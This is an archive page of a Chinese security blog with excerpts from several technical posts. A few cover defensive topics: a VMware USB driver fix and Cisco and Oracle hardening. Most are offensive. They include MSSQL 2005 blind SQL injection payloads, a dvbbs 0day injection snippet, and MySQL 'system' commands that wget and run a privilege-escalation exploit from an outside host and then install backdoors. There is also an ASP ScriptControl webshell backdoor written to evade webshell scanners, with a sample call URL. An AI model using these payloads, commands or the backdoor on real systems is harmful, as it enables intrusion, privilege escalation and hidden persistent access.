存档

‘技术文章’ 分类的存档

解决VMWare的VMware USB Arbitration Service服务与索爱驱动冲突的问题

2011年1月28日 admin 1 条评论

原创 解决VMWare的VMware USB Arbitration Service服务与索爱手机驱动冲突的问题 收藏

现象:VMWare内不能识别USB设备。启动VMware USB Arbitration Service服务时提示:错误31:连接到系统上的设备没有发挥作用。

确认:通过事件查看器可以看到内容形如“Detected unrecognized USB driver (\Driver\seehcri).”的警告信息,在Windows\System32\Drivers目录下可以找到seehcri.sys文件

原因:安装索爱PC Suite之后,seehcri.sys会替换系统中原有的USB驱动,卸载PC Suite不会卸载seehcri.sys

解决:下载AutoRuns for Windows v8.61,解压运行autoruns.exe,在Drivers页找到seehcri.sys,删除。重启系统,进入设备管理器,删除打黄色叹号的USB设备,扫描硬件改动,重新安装驱动程序。
阅读全文…

分类: 技术文章 标签:

渗透技巧总结(zz)

2010年12月12日 admin 没有评论

Form:http://www.80pentest.com/?p=887

旁站路径问题
1、读网站配置。
2、用以下VBS

On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then

Msgbox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ”

Usage:Cscript vWeb.vbs”,4096,”Lilo”
WScript.Quit
End If
Set ObjService=GetObject

(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name)

Then
Set OService=GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)

Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err

<> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[" &

OService.ServerComment & "]”
For Each Binds In OService.ServerBindings

Web = “{ ” & Replace(Binds,”:”,” } { “) & ” }”

WScript.Echo Replace(Split(Replace(Web,” “,”"),”}{“)(2),”}”,”")
Next

WScript.Echo “Path : ” & VDirObj.Path
End If
Next 阅读全文…

分类: 技术文章 标签:

Cisco路由器的安全配置

2010年10月4日 admin 没有评论

一,路由器访问控制的安全配置
1,严格控制可以访问路由器的管理员。任何一次维护都需要记录备案。
2,建议不要远程访问路由器。即使需要远程访问路由器,建议使用访问控制列表和高强度的密码控制。
3,严格控制CON端口的访问。具体的措施有:
A,如果可以开机箱的,则可以切断与CON口互联的物理线路。
B,可以改变默认的连接属性,例如修改波特率(默认是96000,可以改为其他的)。
C,配合使用访问控制列表控制对CON口的访问。
如:Router(Config)#Access-list 1 permit 192.168.0.1
Router(Config)#line con 0
Router(Config-line)#Transport input none
Router(Config-line)#Login local
Router(Config-line)#Exec-timeoute 5 0
Router(Config-line)#access-class 1 in
Router(Config-line)#end
D,给CON口设置高强度的密码。
4,如果不使用AUX端口,则禁止这个端口。默认是未被启用。禁止如:
Router(Config)#line aux 0
Router(Config-line)#transport input none
Router(Config-line)#no exec 阅读全文…

分类: 技术文章 标签:

MSSQL 2005 手工盲注

2010年10月1日 admin 没有评论

转自oldjun博客

http://www.oldjun.com/blog/
好多人贴了2005注入语句,基本是显错模式的,如果显错,很多工具还是可以用的;但盲注,工具貌似就不咋地了,pangolin 注不了2005,其他2005注入的注入工具对于盲注貌似也很感冒;网上没几个盲注语句,于是平时用到的时候自己写,现在贴出来,某些地方类似于 MSSQL2000,不完全一样;其实手工还是蛮快的,还可以想怎么变换就怎么变换。这里贴出的语句盲注时使用,如果可以显错,直接加特殊字符然后 convert到int,不需要这么麻烦。

判断库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)=’2005′

猜数据库名:

先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1
阅读全文…

分类: 技术文章 标签:

Methods of quick exploitation of blind SQL Injection

2010年8月23日 admin 没有评论

http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt

分类: 技术文章 标签:

dvbbs php 2.0 几处0day

2010年8月23日 admin 没有评论

by:T00ls 核心成员 Xhm1n9 2010.8.19

1,joinvipgroup.php  //注入
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];
$btype=$_POST['Btype'];
$vipmoney=$_POST['vipmoney'];
$vipticket=$_POST['vipticket'];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo “@@”;
showmsg($lang['join.info4']);
exit;
} 阅读全文…

分类: 技术文章 标签:

oracle加固经验(个人补充及完善)

2010年8月18日 admin 没有评论

author:man8_msf

最近在牛蝇们的blog里看到了oracle 加固经验一文,结合自己的经验,补充一下。

1.删除或锁定账号

alter user username lock;

drop user username cascade;

2.更改密码

alter user username identified by “password”

3.限制数据库超级管理员远程登录

1. 在spfile中设置

REMOTE_LOGIN_PASSWORDFILE=NONE

2.在sqlnet.ora中设置

SQLNET.AUTHENTICATION_SERVICES=NONE 禁用SYSDBA角色的自动登录 阅读全文…

分类: 技术文章 标签:

linux的又一提权方法

2010年8月17日 admin 没有评论

author:Ra1nker

mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。

mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。

一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行, 搞到 root权限,然后装后门虾米的

mysql>system wget  http://www.ra1nker.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;
这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

分类: 技术文章 标签:

Dedecms <= V5.6 Final模板执行漏洞

2010年8月17日 admin 没有评论

来源: oldjun’s Blog
链接: http://www.oldjun.com/blog/index.php/archives/70/

一、漏洞介绍:

Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附 加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以 成功执行恶意代码。 阅读全文…

分类: 技术文章 标签:

一个较新的ASP后门服务端

2010年7月17日 admin 没有评论
一直很奇怪,为什么客 户端里面不是eval,就是execute,不管我藏哪里,管理员用个什么XX webshell扫描器,就能踢我屁股了。

今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用。研究了下方法,后来和lcx讨论了下。得到了如下代码,在此感谢前 辈的指点,呵呵。

代码很简单,我就不多做解释了,以免有人骂我装。

<%
Set o = Server.CreateObject(“ScriptControl”)
o.language = “vbscript”
o.addcode(Request(“SubCode”)) ‘参数SubCode作为过程代码
o.run “e”,Server,Response,Request,Application,Session,Error ‘参数名e 调用之,同时压入6个基对象作为参数

‘调用示例:
‘http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
%>

注意,虽然能用了,但是实验发现只有lake2客户端能用。希望有牛人出来改得通用一点。呵呵。自己写个客户端专用也不错。

转自:http://hi.baidu.com/ylbhz/blog

分类: 技术文章 标签: